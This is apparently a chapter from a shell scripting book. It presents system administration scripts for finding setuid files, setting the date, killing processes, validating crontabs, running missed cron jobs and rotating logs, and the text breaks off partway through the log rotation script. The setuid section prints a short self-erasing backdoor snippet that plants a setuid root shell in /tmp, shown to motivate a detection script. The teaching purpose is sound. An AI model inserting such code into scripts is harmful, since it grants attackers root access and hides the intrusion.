6
SYSTEM ADMINISTRATION: SYSTEM MAINTENANCE


The most common use of shell scripts is to help with Unix or Linux system administration. There’s an obvious reason for this, of course: administrators are often the most knowledgeable users of the system, and they also are responsible for ensuring that things run smoothly. But there might be an additional reason for the emphasis on shell scripts within the system administration world. Our theory? That system administrators and other power users are the people most likely to be having fun with their system, and shell scripts are quite fun to develop within a Unix environment!

And with that, let’s continue to explore how shell scripts can help you with system administration tasks.

#45 Tracking Set User ID Applications

There are quite a few ways that ruffians and digital delinquents can break into a Linux system, whether they have an account or not, and one of the easiest is finding an improperly protected setuid or setgid command. As discussed in previous chapters, these commands change the effective user for any subcommands they invoke, as specified in the configuration, so a regular user might run a script where the commands in that script are run as the root or superuser. Bad. Dangerous!

In a setuid shell script, for example, adding the following code can create a setuid root shell for the bad guy once the code is invoked by an unsuspecting admin logged in as root.

if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME
  cp /bin/sh /tmp/.rootshell               # REMOVEME
  chown root /tmp/.rootshell               # REMOVEME
  chmod -f 4777 /tmp/.rootshell            # REMOVEME
  grep -v "# REMOVEME" $0 > /tmp/junk      # REMOVEME
  mv /tmp/junk  $0                         # REMOVEME
fi # REMOVEME

Once this script is inadvertently run by root, a copy of /bin/sh is surreptitiously copied into /tmp with the name .rootshell and is made setuid root for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code (hence the # REMOVEME at the end of each line), leaving essentially no trace of what the cracker did.

The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of root; hence the critical need to ensure that you know and approve of all setuid root commands on your system. Of course, you should never have scripts with any sort of setuid or setgid permission for just this reason, but it’s still smart to keep an eye on things.
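If you just want a quick manual check before reaching for the full script, a one-liner along these lines lists setuid and setgid files (the syntax is portable across GNU and BSD find, though scanning a whole filesystem takes a while):

$ sudo find / -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null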

More useful than showing you how to crack a system, however, is showing how to identify all the shell scripts on your system that are marked setuid or setgid! Listing 6-1 details how to accomplish this.

The Code

   #!/bin/bash

   # findsuid--Checks all SUID files or programs to see if they're writeable,
   #   and outputs the matches in a friendly and useful format

   mtime="7"            # How far back (in days) to check for modified cmds.
   verbose=0            # By default, let's be quiet about things.

   if [ "$1" = "-v" ] ; then
     verbose=1          # User specified findsuid -v, so let's be verbose.
   fi

   # find -perm looks at the permissions of the file: -4000 matches
   #   files with the setuid bit set.

 find / -type f -perm -4000 -print0 | while read -d '' -r match
   do
     if [ -x "$match" ] ; then

       # Let's split file owner and permissions from the ls -ld output.

       owner="$(ls -ld $match | awk '{print $3}')"
       perms="$(ls -ld $match | cut -c5-10 | grep 'w')"

       if [ ! -z $perms ] ; then
         echo "**** $match (writeable and setuid $owner)"
       elif [ ! -z $(find $match -mtime -$mtime -print) ] ; then
         echo "**** $match (modified within $mtime days and setuid $owner)"
       elif [ $verbose -eq 1 ] ; then
         # By default, only dangerous scripts are listed. If verbose, show all.
         lastmod="$(ls -ld $match | awk '{print $6, $7, $8}')"
         echo "     $match (setuid $owner, last modified $lastmod)"
       fi
     fi
   done

   exit 0

Listing 6-1: The findsuid script

How It Works

This script checks all setuid commands on the system to see whether they’re group or world writable and whether they’ve been modified in the last $mtime days. To accomplish this, we use the find command with arguments specifying the types of permissions on files to search for. If the user requests verbose output, every script with setuid permissions will be listed, regardless of read/write permission and modification date.

Running the Script

This script has one optional argument: -v produces verbose output that lists every setuid program encountered by the script. This script should be run as root, but it can be run as any user since everyone should have basic access to the key directories.

The Results

We’ve dropped a vulnerable script somewhere in the system. Let’s see if findsuid can find it in Listing 6-2.

$ findsuid
**** /var/tmp/.sneaky/editme (writeable and setuid root)

Listing 6-2: Running the findsuid shell script and finding a backdoor shell script

There it is (Listing 6-3)!

$ ls -l /var/tmp/.sneaky/editme
-rwsrwxrwx  1 root  wheel  25988 Jul 13 11:50 /var/tmp/.sneaky/editme

Listing 6-3: The ls output of the backdoor, showing an s in the permissions, which means it is setuid

That’s a huge hole just waiting for someone to exploit. Glad we found it!

#46 Setting the System Date

Conciseness is at the heart of Linux and its Unix predecessors and has affected Linux’s evolution dramatically. But there are some areas where this succinctness can drive a sysadmin batty. One of the most common annoyances is the format required for resetting the system date, as shown by the date command:

usage: date [[[[[cc]yy]mm]dd]hh]mm[.ss]

Trying to figure out all the square brackets can be baffling, without even talking about what you do or don’t need to specify. We’ll explain: you can enter just minutes; or minutes and seconds; or hours, minutes, and seconds; or the day and month plus all that—or you can add the year and even the century. Yeah, crazy! Instead of trying to figure that out, use a shell script like the one in Listing 6-4, which prompts for each relevant field and then builds the compressed date string. It’s a sure sanity saver.
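For instance, with a BSD-style date command (as on OS X), each of the following is a legal argument (be careful experimenting, since these really do reset the clock):

$ date 1430            # 2:30 PM today
$ date 161430          # 2:30 PM on the 16th of this month
$ date 05161430        # 2:30 PM on May 16
$ date 1705161430      # 2:30 PM on May 16, 2017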

The Code

   #!/bin/bash
   # setdate--Friendly frontend to the date command
   # Date wants: [[[[[cc]yy]mm]dd]hh]mm[.ss]

   # To make things user-friendly, this function prompts for a specific date
   #   value, displaying the default in [] based on the current date and time.

   . library.sh   # Source our library of bash functions to get echon().

 askvalue()
   {
     # $1 = field name, $2 = default value, $3 = max value,
     # $4 = required char/digit length

     echon "$1 [$2] : "
     read answer

     if [ ${answer:=$2} -gt $3 ] ; then
       echo "$0: $1 $answer is invalid"
       exit 0
     elif [ "$(( $(echo $answer | wc -c) - 1 ))" -lt $4 ] ; then
       echo "$0: $1 $answer is too short: please specify $4 digits"
       exit 0
     fi
     eval $1=$answer   # Reload the given variable with the specified value.
   }

 eval $(date "+nyear=%Y nmon=%m nday=%d nhr=%H nmin=%M")

   askvalue year $nyear 3000 4
   askvalue month $nmon 12 2
   askvalue day $nday 31 2
    askvalue hour $nhr 23 2
   askvalue minute $nmin 59 2

   squished="$year$month$day$hour$minute"

   # Or, if you're running a Linux system:
 #   squished="$month$day$hour$minute$year"
   #   Yes, Linux and OS X/BSD systems use different formats. Helpful, eh?

   echo "Setting date to $squished. You might need to enter your sudo password:"
   sudo date $squished

   exit 0

Listing 6-4: The setdate script

How It Works

To make this script as succinct as possible, we use the eval function to accomplish two things. First, this line sets the current date and time values, using a date format string. Second, it sets the values of the variables nyear, nmon, nday, nhr, and nmin, which are then used in the simple askvalue() function to prompt for and test values entered. Using the eval function to assign values to the variables also sidesteps any potential problem of the date rolling over or otherwise changing between separate invocations of the askvalue() function, which would leave the script with inconsistent data. For example, if askvalue got month and day values at 23:59:59 and then hour and minute values at 0:00:02, the system date would actually be set back 24 hours—not at all the desired result.
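You can see what the eval is executing by running the embedded date command on its own; it emits a string of ready-made shell assignments (your values will differ, of course):

$ date "+nyear=%Y nmon=%m nday=%d nhr=%H nmin=%M"
nyear=2017 nmon=05 nday=07 nhr=16 nmin=53

The eval then runs that output as shell code, loading all five variables from a single, atomic snapshot of the clock.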

We also need to ensure we use the correct date format string for our system, since, for instance, OS X requires a specific format when setting the date and Linux requires a slightly different format. By default, this script uses the OS X date format, but notice that a format string for Linux is also provided in the comments.

This is one of the subtle problems with working with the date command. With this script, if you specify the exact time during the prompts but then have to enter a sudo password, you could end up setting the system time to a few seconds in the past. It’s probably not a problem, but this is one reason why network-connected systems should be working with Network Time Protocol (NTP) utilities to synchronize their system against an official timekeeping server. You can start down the path of network time synchronization by reading up on timed(8) on your Linux or Unix system.

Running the Script

Notice that this script uses the sudo command to run the actual date reset as root, as Listing 6-5 shows. By entering an incorrect password to sudo, you can experiment with this script without worrying about any strange results.

The Results

$ setdate
year [2017] :
month [05] :
day [07] :
hour [16] : 14
minute [53] : 50
Setting date to 201705071450. You might need to enter your sudo password:
passwd:
$

Listing 6-5: Testing the interactive setdate script

#47 Killing Processes by Name

Linux and some Unixes have a helpful command called killall, which allows you to kill all running applications that match a specified pattern. It can be quite useful when you want to kill nine mingetty daemons, or even just to send a SIGHUP signal to xinetd to prompt it to reread its configuration file. Systems that don’t have killall can emulate it in a shell script built around ps for identification of matching processes and kill to send the specified signal.

The trickiest part of the script is that the output format from ps varies significantly from OS to OS. For example, consider how differently FreeBSD, Red Hat Linux, and OS X show running processes in the default ps output. First take a look at the output of FreeBSD:

BSD $ ps
 PID TT  STAT    TIME COMMAND
 792  0  Ss   0:00.02 -sh (sh)
4468  0  R+   0:00.01 ps

Compare this output to that of Red Hat Linux:

RHL $ ps
  PID TTY          TIME CMD
 8065 pts/4    00:00:00 bash
12619 pts/4    00:00:00 ps

And finally, compare to the output of OS X:

OSX $ ps
  PID TTY           TIME CMD
37055 ttys000    0:00.01 -bash
26881 ttys001    0:00.08 -bash

Worse, rather than model its ps command after a typical Unix command, the GNU ps command accepts BSD-style flags, SYSV-style flags, and GNU-style flags. A complete mishmash!

Fortunately, some of these inconsistencies can be sidestepped in this particular script by using the cu flag, which produces far more consistent output that includes the owner of the process, the full command name, and—what we’re really interested in—the process ID.

This is also the first script where we’re really using all the power of the getopts command, which lets us work with lots of different command-line options and even pull in optional values. The script in Listing 6-6 has four starting flags, three of which have required arguments: -s SIGNAL, -u USER, -t TTY, and -n. You’ll see them in the first block of code.

The Code

   #!/bin/bash

   # killall--Sends the specified signal to all processes that match a
   #   specific process name

   # By default it kills only processes owned by the same user, unless you're
   #   root. Use -s SIGNAL to specify a signal to send to the process, -u USER
   #   to specify the user, -t TTY to specify a tty, and -n to only report what
   #   should be done, rather than doing it.

   signal="-INT"      # Default signal is an interrupt.
   user=""   tty=""   donothing=0

   while getopts "s:u:t:n" opt; do
     case "$opt" in
           # Note the trick below: the actual kill command wants -SIGNAL
           #   but we want SIGNAL, so we'll just prepend the "-" below.
       s ) signal="-$OPTARG";              ;;
       u ) if [ ! -z "$tty" ] ; then
             # Logic error: you can't specify a user and a TTY device
             echo "$0: error: -u and -t are mutually exclusive." >&2
             exit 1
           fi
           user=$OPTARG;                  ;;
       t ) if [ ! -z "$user" ] ; then
              echo "$0: error: -u and -t are mutually exclusive." >&2
              exit 1
           fi
        tty=$OPTARG;                   ;;
       n ) donothing=1;                   ;;
       ? ) echo "Usage: $0 [-s signal] [-u user|-t tty] [-n] pattern" >&2
           exit 1
     esac
   done

   # Done with processing all the starting flags with getopts...
   shift $(( $OPTIND - 1 ))

   # If the user doesn't specify any starting arguments (earlier test is for -?)
   if [ $# -eq 0 ] ; then
     echo "Usage: $0 [-s signal] [-u user|-t tty] [-n] pattern" >&2
     exit 1
   fi

   # Now we need to generate a list of matching process IDs, either based on
   #   the specified TTY device, the specified user, or the current user.

   if [ ! -z "$tty" ] ; then
    pids=$(ps cu -t "$tty" | awk "/ $1$/ { print \$2 }")
    elif [ ! -z "$user" ] ; then
    pids=$(ps cu -U "$user" | awk "/ $1$/ { print \$2 }")
    else
    pids=$(ps cu -U ${USER:-$LOGNAME} | awk "/ $1$/ { print \$2 }")
   fi

   # No matches? That was easy!
   if [ -z "$pids" ] ; then
     echo "$0: no processes match pattern $1" >&2
     exit 1
   fi

   for pid in $pids
   do
     # Sending signal $signal to process id $pid: kill might still complain
     #   if the process has finished, the user doesn't have permission to kill
     #   the specific process, etc., but that's okay. Our job, at least, is done.
     if [ $donothing -eq 1 ] ; then
       echo "kill $signal $pid" # The -n flag: "show me, but don't do it"
     else
       kill $signal $pid
     fi
   done

   exit 0

Listing 6-6: The killall script

How It Works

Because this script is so aggressive and potentially dangerous, we’ve put extra effort into minimizing false pattern matches so that a pattern like sh won’t match output from ps that contains bash or vi crashtest.c or other values that embed the pattern. This is done by the anchoring added around the pattern in each of the three awk invocations.

Left-rooting the specified pattern, $1, with a leading space and right-rooting it with a trailing $ causes the script to search for the specified pattern 'sh' in the ps output as ' sh$'.
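You can see the effect of that anchoring at the command line. This one-liner prints the PIDs of your processes whose command name is exactly bash (the standalone version uses single quotes, whereas the script double-quotes the awk program so that $1 interpolates, which is why the field reference there is escaped as \$2):

$ ps cu -U ${USER:-$LOGNAME} | awk '/ bash$/ { print $2 }'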

Running the Script

This script has a variety of starting flags that let you modify its behavior. The -s SIGNAL flag allows you to specify a signal other than the default interrupt signal, SIGINT, to send to the matching process or processes. The -u USER and -t TTY flags are useful primarily to the root user in killing all processes associated with a specified user or TTY device, respectively. And the -n flag gives you the option of having the script report what it would do without actually sending any signals. Finally, a process name pattern must be specified.

The Results

To kill all the csmount processes on OS X, you can now use the killall script, as Listing 6-7 shows.

$ ./killall -n csmount
kill -INT 1292
kill -INT 1296
kill -INT 1306
kill -INT 1310
kill -INT 1318

Listing 6-7: Running the killall script on any csmount processes

Hacking the Script

There’s an unlikely, though not impossible, bug that could surface while running this script. To match only the specified pattern, the awk invocation prints the process IDs of commands that match the pattern when it is preceded by a space and anchored at the end of the input line. But it’s theoretically possible to have two processes running—say, one called bash and the other emulate bash. If killall is invoked with bash as the pattern, both of these processes will be matched, although only the former is a true match. Solving this to give consistent cross-platform results would prove quite tricky.
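One way to tighten the match, sketched here rather than folded into the script, is to ask ps for exactly two output columns and compare the command name as a whole string instead of with a regular expression. The -o pid=,comm= syntax is widely supported, but verify it on your platform before relying on this:

pids=$(ps -U ${USER:-$LOGNAME} -o pid=,comm= | \
  awk -v cmd="$1" '{ pid = $1; sub(/^[ \t]*[0-9]+[ \t]+/, ""); if ($0 == cmd) print pid }')

Because the remainder of each line is compared to the pattern in full, a process named emulate bash no longer matches the pattern bash.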

If you’re motivated, you could also write a script based heavily on the killall script that would let you renice jobs by name, rather than just by process ID. The only change required would be to invoke renice rather than kill. Invoking renice lets you change the relative priority of programs, allowing you, for example, to lower the priority of a long file transfer while increasing the priority of the video editor that the boss is running.
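A minimal sketch of that change, assuming a niceval variable set from a new starting flag you’d add to the getopts string (say, -p PRIORITY), replaces the kill in the final loop:

if [ $donothing -eq 1 ] ; then
  echo "renice $niceval -p $pid"   # The -n flag: show it, don't do it.
else
  renice $niceval -p $pid
fi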

#48 Validating User crontab Entries

One of the most helpful facilities in the Linux universe is cron, with its ability to schedule jobs at arbitrary times in the future or have them run automatically every minute, every few hours, monthly, or even annually. Every good system administrator has a Swiss Army knife of scripts running from the crontab file.

However, the format for entering cron specifications is a bit tricky, and the cron fields have numeric values, ranges, sets, and even mnemonic names for days of the week or months. What’s worse is that the crontab program generates cryptic error messages when it encounters problems in a user or system cron file.

For example, if you specify a day of the week with a typo, crontab reports an error similar to the one shown here:

"/tmp/crontab.Dj7Tr4vw6R":9: bad day-of-week
crontab: errors in crontab file, can't install

In fact, there’s a second error in the sample input file, on line 12, but crontab’s poor error-checking code forces us to take the long way around to find it.

Instead of error checking the way crontab wants you to, a somewhat lengthy shell script (see Listing 6-8) can step through the crontab files, checking the syntax and ensuring that values are within reasonable ranges. One of the reasons that this validation is possible in a shell script is that sets and ranges can be treated as individual values. So to test whether 3-11 or 4, 6, and 9 are acceptable values for a field, simply test 3 and 11 in the former case and 4, 6, and 9 in the latter.
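The transformation that makes this possible is easy to see in isolation. The sed expression used throughout the script simply turns list and range punctuation into whitespace:

$ echo "3-11" | sed 's/[,-]/ /g'
3 11
$ echo "4,6,9" | sed 's/[,-]/ /g'
4 6 9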

The Code

   #!/bin/bash
   # verifycron--Checks a crontab file to ensure that it's formatted properly.
   #   Expects standard cron notation of min hr dom mon dow CMD, where min is
   #   0-59, hr is 0-23, dom is 1-31, mon is 1-12 (or names), and dow is 0-7
   #   (or names). Fields can be ranges (a-e) or lists separated by commas
   #   (a,c,z) or an asterisk. Note that the step value notation of Vixie cron
   #   (e.g., 2-6/2) is not supported by this script in its current version.

   validNum()
   {
     # Return 0 if the number given is a valid integer and 1 if not.
     #   Specify both number and maxvalue as args to the function.
     num=$1   max=$2

     # Asterisk values in fields are rewritten as "X" for simplicity,
     #   so any number in the form "X" is de facto valid.

     if [ "$num" = "X" ] ; then
       return 0
      elif [ ! -z "$(echo $num | sed 's/[[:digit:]]//g')" ] ; then
       # Stripped out all the digits, and the remainder isn't empty? No good.
       return 1
     elif [ $num -gt $max ] ; then
       # Number is bigger than the maximum value allowed.
       return 1
     else
       return 0
     fi
   }

   validDay()
   {
     # Return 0 if the value passed to this function is a valid day name;
     #   1 otherwise.

     case $(echo $1 | tr '[:upper:]' '[:lower:]') in
       sun*|mon*|tue*|wed*|thu*|fri*|sat*) return 0 ;;
       X) return 0 ;;         # Special case, it's a rewritten "*"
       *) return 1
     esac
   }

   validMon()
   {
     # This function returns 0 if given a valid month name; 1 otherwise.

     case $(echo $1 | tr '[:upper:]' '[:lower:]') in
       jan*|feb*|mar*|apr*|may|jun*|jul*|aug*) return 0           ;;
       sep*|oct*|nov*|dec*)                    return 0           ;;
       X) return 0 ;; # Special case, it's a rewritten "*"
       *) return 1        ;;
     esac
   }

 fixvars()
   {
     # Translate all '*' into 'X' to bypass shell expansion hassles.
     #   Save original input as "sourceline" for error messages.

     sourceline="$min $hour $dom $mon $dow $command"
       min=$(echo "$min" | tr '*' 'X')      # Minute
       hour=$(echo "$hour" | tr '*' 'X')    # Hour
       dom=$(echo "$dom" | tr '*' 'X')      # Day of month
       mon=$(echo "$mon" | tr '*' 'X')      # Month
       dow=$(echo "$dow" | tr '*' 'X')      # Day of week
   }

   if [ $# -ne 1 ] || [ ! -r $1 ] ; then
     # If no crontab filename is given or if it's not readable by the script, fail.
     echo "Usage: $0 usercrontabfile" >&2
     exit 1
   fi

   lines=0  entries=0  totalerrors=0

   # Go through the crontab file line by line, checking each one.

   while read min hour dom mon dow command
   do
     lines="$(( $lines + 1 ))"
     errors=0

     if [ -z "$min" -o "${min%${min#?}}" = "#" ] ; then
       # If it's a blank line or the first character of the line is "#", skip it.
       continue    # Nothing to check
     fi


     ((entries++))

     fixvars

     # At this point, all the fields in the current line are split out into
     #   separate variables, with all asterisks replaced by "X" for convenience,
     #   so let's check the validity of input fields...

     # Minute check

   for minslice in $(echo "$min" | sed 's/[,-]/ /g') ; do
        if ! validNum $minslice 59 ; then
         echo "Line ${lines}: Invalid minute value \"$minslice\""
         errors=1
       fi
     done

     # Hour check

   for hrslice in $(echo "$hour" | sed 's/[,-]/ /g') ; do
        if ! validNum $hrslice 23 ; then
         echo "Line ${lines}: Invalid hour value \"$hrslice\""
         errors=1
       fi
     done

     # Day of month check

   for domslice in $(echo $dom | sed 's/[,-]/ /g') ; do
       if ! validNum $domslice 31 ; then
         echo "Line ${lines}: Invalid day of month value \"$domslice\""
         errors=1
       fi
     done

     # Month check: Has to check for numeric values and names both.
     #   Remember that a conditional like "if ! cond" means that it's
     #   testing whether the specified condition is FALSE, not true.

   for monslice in $(echo "$mon" | sed 's/[,-]/ /g') ; do
       if ! validNum $monslice 12 ; then
         if ! validMon "$monslice" ; then
           echo "Line ${lines}: Invalid month value \"$monslice\""
           errors=1
         fi
       fi
     done

     # Day of week check: Again, name or number is possible.

   for dowslice in $(echo "$dow" | sed 's/[,-]/ /g') ; do
       if ! validNum $dowslice 7 ; then
         if ! validDay $dowslice ; then
           echo "Line ${lines}: Invalid day of week value \"$dowslice\""
           errors=1
         fi
       fi
     done

     if [ $errors -gt 0 ] ; then
       echo ">>>> ${lines}: $sourceline"
       echo ""
       totalerrors="$(( $totalerrors + 1 ))"
     fi
   done < $1 # read the crontab passed as an argument to the script

   # Notice that it's here, at the very end of the while loop, that we
   #   redirect the input so that the user-specified filename can be
   #   examined by the script!

   echo "Done. Found $totalerrors errors in $entries crontab entries."

   exit 0

Listing 6-8: The verifycron script

How It Works

The greatest challenge in getting this script to work is sidestepping problems with the shell wanting to expand the asterisk field value (*). An asterisk is perfectly acceptable in a cron entry and is actually quite common, but if you give one to a subshell via a $( ) sequence or pipe, the shell will automatically expand it to a list of files in the current directory—definitely not the desired result. Rather than puzzle through the combination of single and double quotes necessary to solve this problem, it proves quite a bit simpler to replace each asterisk with an X, which is what the fixvars function does as it splits things into separate variables for later testing.
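A quick experiment shows the hazard and the fix. Run in any directory that contains a few files, an unquoted asterisk balloons into a file listing the moment the shell word-splits it, whereas the rewritten X stays inert:

$ star="*"
$ echo $star          # Unquoted: expands to the directory contents.
file1 file2 file3
$ echo "$star" | tr '*' 'X'
X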

Also worthy of note is the simple solution to processing comma- and dash-separated lists of values. The punctuation is simply replaced with spaces, and each value is tested as if it were a stand-alone numeric value. That’s what the $( ) sequence does in each of the five field-checking for loops:

$(echo "$dow" | sed 's/[,-]/ /g')

This makes it simple to step through all numeric values, ensuring that each and every value is valid and within the range for that specific crontab field parameter.

Running the Script

This script is easy to run: just specify the name of a crontab file as its only argument. To work with an existing crontab file, see Listing 6-9.

$ crontab -l > my.crontab
$ verifycron my.crontab
$ rm my.crontab

Listing 6-9: Running the verifycron script after exporting the current cron file

The Results

Using a sample crontab file that has two errors and lots of comments, the script produces the results shown in Listing 6-10.

$ verifycron sample.crontab
Line 10: Invalid day of week value "Mou"
>>>> 10: 06 22 * * Mou /home/ACeSystem/bin/del_old_ACinventories.pl

Line 12: Invalid minute value "99"
>>>> 12: 99 22 * * 1-3,6 /home/ACeSystem/bin/dump_cust_part_no.pl

Done. Found 2 errors in 13 crontab entries.

Listing 6-10: Running the verifycron script on a cron file with invalid entries

The sample crontab file with the two errors, along with all the shell scripts explored in this book, are available at http://www.nostarch.com/wcss2/.

Hacking the Script

A few enhancements would potentially be worth adding to this script. Validating the compatibility of month and day combinations would ensure that users don’t schedule a cron job to run on, for example, 31 February. It could also be useful to check whether the command being invoked can actually be found, but that would entail parsing and processing a PATH variable (that is, a list of directories within which to look for commands specified in the script), which can be set explicitly within a crontab file. That could be quite tricky. . . . Lastly, you could add support for values such as @hourly or @reboot, special values in cron used to denote the common times scripts can run.
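For the @-keyword case, a minimal sketch might special-case those entries near the top of the while loop, before the field checks (note that on such lines everything after the keyword is the command itself, so the five-field checks don’t apply):

case "$min" in
  @hourly|@daily|@weekly|@monthly|@yearly|@annually|@reboot)
    continue   # Recognized shortcut entry: nothing numeric to validate.
    ;;
esac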

#49 Ensuring that System cron Jobs Are Run

Until recently, Linux systems were all designed to run as servers—up 24 hours a day, 7 days a week, forever. You can see that implicit expectation in the design of the cron facility: there’s no point in scheduling jobs for 2:17 AM every Thursday if the system is shut down at 6:00 PM every night.

Yet many modern Unix and Linux users are running on desktops and laptops and therefore do shut down their systems at the end of the day. It can be quite alien to OS X users, for example, to leave their systems running overnight, let alone over a weekend or holiday.

This isn’t a big deal with user crontab entries, because those that don’t run due to shutdown schedules can be tweaked to ensure that they do eventually get invoked. The problem arises when the daily, weekly, and monthly system cron jobs that are part of the underlying system are not run at the specified times.

That’s the purpose of the script in Listing 6-11: to allow the administrator to invoke the daily, weekly, or monthly jobs directly from the command line, as needed.

The Code

   #!/bin/bash

   # docron--Runs the daily, weekly, and monthly system cron jobs on a system
   #   that's likely to be shut down during the usual time of day when the system
   #   cron jobs would otherwise be scheduled to run.

   rootcron="/etc/crontab"   # This is going to vary significantly based on
                             # which version of Unix or Linux you've got.

   if [ $# -ne 1 ] ; then
     echo "Usage: $0 [daily|weekly|monthly]" >&2
     exit 1
   fi

   # If this script isn't being run by the administrator, fail out.
   #   In earlier scripts, you saw USER and LOGNAME being tested, but in
   #   this situation, we'll check the user ID value directly. Root = 0.

   if [ "$(id -u)" -ne 0 ] ; then
     # Or you can use $(whoami) != "root" here, as needed.
     echo "$0: Command must be run as 'root'" >&2
     exit 1
   fi

   # We assume that the root cron has entries for 'daily', 'weekly', and
   #   'monthly' jobs. If we can't find a match for the one specified, well,
   #   that's an error. But first, we'll try to get the command if there is
   #   a match (which is what we expect).

 job="$(awk "NF > 6 && /$1/ { for (i=7;i<=NF;i++) print \$i }" $rootcron)"

   if [ -z "$job" ] ; then   # No job? Weird. Okay, that's an error.
     echo "$0: Error: no $1 job found in $rootcron" >&2
     exit 1
   fi

   SHELL=$(which sh)        # To be consistent with cron's default

 eval $job                # We'll exit once the job is finished.

Listing 6-11: The docron script

How It Works

The cron jobs located in /etc/daily, /etc/weekly, and /etc/monthly (or /etc/cron.daily, /etc/cron.weekly, and /etc/cron.monthly) are set up completely differently from user crontab files: each is a directory that contains a set of scripts, one per job, that are run by the crontab facility, as specified in the /etc/crontab file. To make this even more confusing, the format of the /etc/crontab file is different too, because it adds an additional field that indicates what effective user ID should run the job.

The /etc/crontab file specifies the hour of the day (in the second column of the output that follows) at which to run the daily, weekly, and monthly jobs in a format that’s completely different from what you’ve seen as a regular Linux user, as shown here:

$ egrep '(daily|weekly|monthly)' /etc/crontab
# Run daily/weekly/monthly jobs.
15      3       *       *       *       root    periodic daily
30      4       *       *       6       root    periodic weekly
30      5       1       *       *       root    periodic monthly

What happens to the daily, weekly, and monthly jobs if this system isn’t running at 3:15 AM every night, at 4:30 AM on Saturday morning, and at 5:30 AM on the first of each month? Nothing. They just don’t run.

Rather than trying to force cron to run the jobs, the script we’ve written identifies the jobs in this file and runs them directly with the eval on the very last line. The only difference between invoking the jobs found from this script and invoking them as part of a cron job is that when jobs are run from cron, their output stream is automatically turned into an email message, whereas this script displays the output stream on the screen.

You could, of course, duplicate cron’s email behavior by invoking the script as shown here:

./docron weekly | mail -E -s "weekly cron job" admin

Running the Script

This script must be run as root and has one parameter—either daily, weekly, or monthly—to indicate which group of system cron jobs you want to run. As usual, we highly recommend using sudo to run any script as root.

The Results

This script has essentially no direct output and displays only results from scripts run in the crontab, unless an error is encountered either within the script or within one of the jobs spawned by the cron scripts.

Hacking the Script

Some jobs shouldn’t be run more than once a week or once a month, so there really should be some sort of check in place to ensure they aren’t run more often. Furthermore, sometimes the recurring system jobs might well run from cron, so we can’t make a blanket assumption that if docron hasn’t run, the jobs haven’t run.

One solution would be to create three empty timestamp files, one each for daily, weekly, and monthly jobs, and then to add new entries to the /etc/daily, /etc/weekly, and /etc/monthly directories that update the last-modified date of each timestamp file with touch. This would solve half the problem: docron could then check the last time the recurring cron job was invoked and quit if an insufficient amount of time had passed to justify the job’s being run again.
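A minimal sketch of that check, as it might look in docron just before the eval (the stamp location and the per-schedule day counts are assumptions, and the touch entries in the periodic directories are a separate piece of the puzzle):

stamp="/var/run/docron.$1.stamp"
case "$1" in
  daily)   mindays=1  ;;
  weekly)  mindays=7  ;;
  monthly) mindays=28 ;;
esac

if [ -f "$stamp" ] && [ -z "$(find "$stamp" -mtime +$mindays -print)" ] ; then
  echo "$0: $1 jobs already ran within the last $mindays day(s); skipping" >&2
  exit 0
fi

eval $job && touch "$stamp"   # Update the stamp only if the jobs succeed.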

The situation this solution doesn’t handle is this: six weeks after the monthly cron job last ran, the admin runs docron to invoke the monthly jobs. Then four days later, someone forgets to shut off their computer, and the monthly cron job is invoked. How can that job know that it’s not necessary to run the monthly jobs after all?

Two scripts can be added to the appropriate directory. One script must run first from run-script or periodic (the standard ways to invoke cron jobs) and can then turn off the executable bit on all other scripts in the directory except its partner script, which turns the executable bit back on after run-script or periodic has scanned and ascertained that there’s nothing to do: none of the files in the directory appear to be executable, and therefore cron doesn’t run them. This is not a great solution, however, because there’s no guarantee of script evaluation order, and if we can’t guarantee the order in which the new scripts will be run, the entire solution fails.

There might not be a complete solution to this dilemma, actually. Or it might involve writing a wrapper for run-script or periodic that would know how to manage timestamps to ensure that jobs weren’t executed too frequently. Or maybe we’re worrying about something that’s not really that big a deal in the big picture.

#50 Rotating Log Files

Users who don’t have much experience with Linux can be quite surprised by how many commands, utilities, and daemons log events to system log files. Even on a computer with lots of disk space, it’s important to keep an eye on the size of these files—and, of course, on their contents.

As a result, many sysadmins have a set of instructions that they place at the top of their log file analysis utilities, similar to the commands shown here:

mv $log.2 $log.3
mv $log.1 $log.2
mv $log $log.1
touch $log

If run weekly, this would produce a rolling one-month archive of log file information divided into week-size portions of data. However, it’s just as easy to create a script that accomplishes this for all log files in the /var/log directory at once, thereby relieving any log file analysis scripts of the burden and managing logs even in months when the admin doesn’t analyze anything.

The script in Listing 6-12 steps through each file in the /var/log directory that matches a particular set of criteria, checking each matching file’s rotation schedule and last-modified date to see whether it’s time for the file to be rotated. If it is time for a rotation, the script does just that.

The Code

#!/bin/bash
# rotatelogs--Rolls logfiles in /var/log for archival purposes and to ensure
#   that the files don't get unmanageably large. This script uses a config
#   file to allow customization of how frequently each log should be rolled.
#   The config file is in logfilename=duration format, where duration is
#   in days. If, in the config file, an entry is missing for a particular
#   logfilename, rotatelogs won't rotate the file more frequently than every
#   seven days. If duration is set to zero, the script will ignore that
#   particular set of log files.

logdir="/var/log"             # Your logfile directory could vary.
config="$logdir/rotatelogs.conf"
mv="/bin/mv"

default_duration=7     # We'll default to a 7-day rotation schedule.
count=0

duration=$default_duration

if [ ! -f $config ] ; then
  # No config file for this script? We're out. You could also safely remove
  #   this test and simply ignore customizations when the config file is
  #   missing.
  echo "$0: no config file found. Can't proceed." >&2
  exit 1
fi

if [ ! -w $logdir -o ! -x $logdir ] ; then
  # -w is write permission and -x is execute. You need both to create new
  #   files in a Unix or Linux directory. If you don't have 'em, we fail.
  echo "$0: you don't have the appropriate permissions in $logdir" >&2
  exit 1
fi

cd $logdir

# While we'd like to use a standardized set notation like :digit: with
#   the find, many versions of find don't support POSIX character class
#   identifiers--hence [0-9].

# This is a pretty gnarly find statement that's explained in the prose
#   further in this section. Keep reading if you're curious!

for name in $(find . -maxdepth 1 -type f -size +0c ! -name '*[0-9]*' \
     ! -name '\.*' ! -name '*conf' -print | sed 's/^\.\///')
do

  count=$(( $count + 1 ))
  # Grab the matching entry from the config file for this particular log file.

  duration="$(grep "^${name}=" $config|cut -d= -f2)"

  if [ -z "$duration" ] ; then
    duration=$default_duration   # If there isn't a match, use the default.
  elif [ "$duration" = "0" ] ; then
    echo "Duration set to zero: skipping $name"
    continue
  fi

  # Set up the rotation filenames. Easy enough:

  back1="${name}.1"; back2="${name}.2";
  back3="${name}.3"; back4="${name}.4";

  # If the most recently rolled log file (back1) has been modified within
  #   the specific quantum, then it's not time to rotate it. This can be
